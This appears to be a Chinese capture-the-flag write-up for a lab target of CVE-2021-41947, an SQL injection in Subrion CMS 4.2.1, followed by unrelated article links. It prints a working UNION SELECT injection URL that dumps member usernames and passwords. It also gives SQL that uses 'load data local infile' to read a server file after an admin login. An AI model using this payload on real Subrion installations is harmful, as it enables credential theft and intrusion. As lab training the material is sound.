当前位置: 首页 > news >正文

春秋云镜 CVE-2021-41947

news 2025/8/12 8:55:38

春秋云镜 CVE-2021-41947 Subrion CMS v4.2.1 存在sql注入

靶标介绍

Subrion CMS v4.2.1 存在sql注入。

启动场景

在这里插入图片描述

漏洞利用

exp

http://localhost/panel/visual-mode.json?get=access&type=blocks' UNION ALL SELECT username, password FROM sbr421_members -- -&object=landing_what_is_this&page=index

admin/admin 登录后台
在这里插入图片描述
http://eci-2zeeqgumki5vc43zsipj.cloudeci1.ichunqiu.com/panel/visual-mode.json?get=access&type=blocks%27%20UNION%20ALL%20SELECT%20username,%20password%20FROM%20sbr415_members%20–%20-&object=landing_what_is_this&page=index
在这里插入图片描述
进入管理仪表盘http://eci-2zeeqgumki5vc43zsipj.cloudeci1.ichunqiu.com/panel/database/
在这里插入图片描述

CREATE TABLE xxx(data TEXT);
load data local infile ‘/flag’ into table xxx;
select * from xxx;

在这里插入图片描述
得到flag

flag{9ff99874-e577-4746-a77b-1b3020a20242}

http://www.lryc.cn/news/123952.html

相关文章:

  • 面试题-React(一):React是什么?它的主要特点是什么?
  • 算法笔试 java 输入输出练习
  • 5.内置构造函数
  • DG故障切换及DG Broker失效配置清理
  • 地毯(暴力+差分两种方法)
  • 最新智能AI系统+ChatGPT源码搭建部署详细教程+知识库+附程序源码
  • 记一次Kafka重复消费解决过程
  • 人工智能在公检系统中的应用:校对软件助推刑事侦查工作
  • OSI七层模型和TCP/IP四层模型
  • vant金额输入框
  • uni-app base64转图片
  • 【webpack】自定义loader
  • 【kubernetes】在k8s集群环境上,部署kubesphere
  • STM32 F103C8T6学习笔记4:时钟树、滴答计时器、定时器定时中断
  • 代理模式【Proxy Pattern】
  • Oracle切割字符串的方法,SQL语句完成。
  • Https、CA证书、数字签名
  • Jmeter-压测时接口按照顺序执行-临界部分控制器
  • linux 文件权限识别及其修改
  • Java:简单算法:冒泡排序、选择排序、二分查找
  • C、C++项目中 configure、makefile.am、makefile.in、makefile 之间的关系
  • 【网络】传输层——UDP | TCP(协议格式确认应答超时重传连接管理)
  • 198.打家劫舍 ● 213.打家劫舍II ● 337.打家劫舍III
  • ArcGIS Maps SDK for JavaScript系列之一:在Vue3中加载ArcGIS地图
  • 服务器扩展未生效
  • Jenkins构建自由风格项目发布jar到服务器
  • Rabbitmq延迟消息
  • miniExcel 生成excel
  • Handler详解
  • Feign忽略Https的SSL最佳方案(且保证负载均衡将失效)